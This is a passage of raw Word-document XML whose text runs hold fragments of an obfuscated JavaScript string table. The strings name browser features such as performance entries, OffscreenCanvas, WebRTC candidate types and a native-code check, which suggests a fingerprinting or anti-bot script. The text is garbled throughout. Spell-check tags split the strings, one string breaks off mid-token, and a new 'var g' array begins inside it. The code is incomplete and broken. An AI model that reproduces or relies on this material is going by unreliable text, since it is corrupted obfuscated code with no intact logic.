        <w:t>"O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0","t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB","jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ","U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74","bDKbeclZUqkceQ", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", 